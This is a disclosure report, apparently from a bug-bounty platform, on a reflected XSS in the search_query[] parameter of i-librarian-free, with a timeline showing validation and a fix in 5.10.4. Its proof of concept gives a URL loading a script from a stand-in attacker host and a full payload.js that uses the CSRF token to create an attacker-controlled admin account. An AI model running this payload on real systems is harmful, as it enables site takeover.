Reflected XSS at search_query[] query string in mkucej/i-librarian-free

Valid

Reported on

May 2nd 2023


Description

Reflected XSS (Cross-Site Scripting) is a common web security vulnerability that can occur when a user inputs malicious Javascript syntax into the search field.

The search function allows users to look for content on the website, and the search keywords are appended to the URL query string. If the website fails to properly filter and prohibit unvalidated input in the search query string, this can provide an opportunity for attackers to inject malicious code.

Attackers can construct a malicious search query string and inject Javascript code into it. When a victim accesses the link through the search keywords, the browser will parse the query string and execute the Javascript code, allowing the attacker to successfully carry out their attack.

Proof of Concept

https://i-librarian.net/demo/index.php/#items/main?search_query%5B%5D=%3Cscript%20src%3D%22%2F%2Fattacker_host%2Fpayload.js%22%3E%3C%2Fscript%3E&search_boolean%5B%5D=AND&search_type%5B%5D=anywhere
# playload.js

function payload() {
  const data = "user%5Busername%5D=&user%5Bfirst_name%5D=&user%5Blast_name%5D=&user%5Bemail%5D=attacker%40mail.com&user%5Bpermissions%5D=A&csrfToken=" + csrfToken;

  const xhr = new XMLHttpRequest();
  xhr.withCredentials = true;

  xhr.addEventListener("readystatechange", function () {
    if (this.readyState === this.DONE) {
      alert(this.responseText);
    }
  });

  xhr.open("POST", "/index.php/users/create");
  xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; rv:112.0) Gecko/20100101 Firefox/112.0");
  xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Accept-Encoding", "gzip, deflate, br");
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
  xhr.setRequestHeader("X-Client-Width", "1512");
  xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  xhr.setRequestHeader("Origin", "https://i-librarian.net");
  xhr.setRequestHeader("DNT", "1");
  xhr.setRequestHeader("Connection", "keep-alive");
  xhr.setRequestHeader("Referer", "https://i-librarian.net/");
  xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
  xhr.setRequestHeader("Sec-Fetch-Mode", "cors");
  xhr.setRequestHeader("Sec-Fetch-Site", "same-origin");
  xhr.setRequestHeader("Sec-GPC", "1");
  xhr.setRequestHeader("Pragma", "no-cache");
  xhr.setRequestHeader("Cache-Control", "no-cache");

  xhr.send(data);
}

setTimeout(payload, 2000);

Impact

The impact of a successful Reflected XSS attack via a search field can be very severe, as it can allow an attacker to execute malicious Javascript code on the victim's browser. The consequences can range from defacing the website, redirecting the victim to a malicious site, stealing the victim's sensitive data, to even performing actions on behalf of the victim without their knowledge.

In addition, Reflected XSS can also impact the website's reputation and trust, as it indicates that the site has not properly implemented input validation and may raise concerns among the site visitors about the overall security of the website.

Therefore, it's crucial to proactively prevent Reflected XSS attacks by implementing proper security measures and performing regular vulnerability assessments to identify and remediate potential security vulnerabilities in the search function and across the site.

Clicking on a link and logging into the dashboard as an administrator may activate automated malicious code that can create an attacker's account and obtain the password with admin permissions. It is essential to exercise utmost caution with this significant risk and take prompt measures to protect your system's security.

Occurrences

In the code, the value of $get['search_query'][$i] are directly embedded into an HTML tag using the html() method, without any input validation or sanitization. If $get['search_query'][$i] values contain malicious Javascript code, it could be executed in the victim’s browser when they access the page, potentially leading to a Reflected XSS attack.

We are processing your report and will contact the mkucej/i-librarian-free team within 24 hours. 10 months ago
7a6163 modified the report
10 months ago
7a6163 modified the report
10 months ago
7a6163 modified the report
10 months ago
7a6163 modified the report
10 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 10 months ago
Martin Kucej gave praise 9 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Martin Kucej validated this vulnerability 9 months ago
7a6163 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Martin Kucej marked this as fixed in 5.10.4 with commit 3f2c64 9 months ago
The fix bounty has been dropped
items.php#L395 has been validated
This vulnerability has now been published 9 months ago
to join this conversation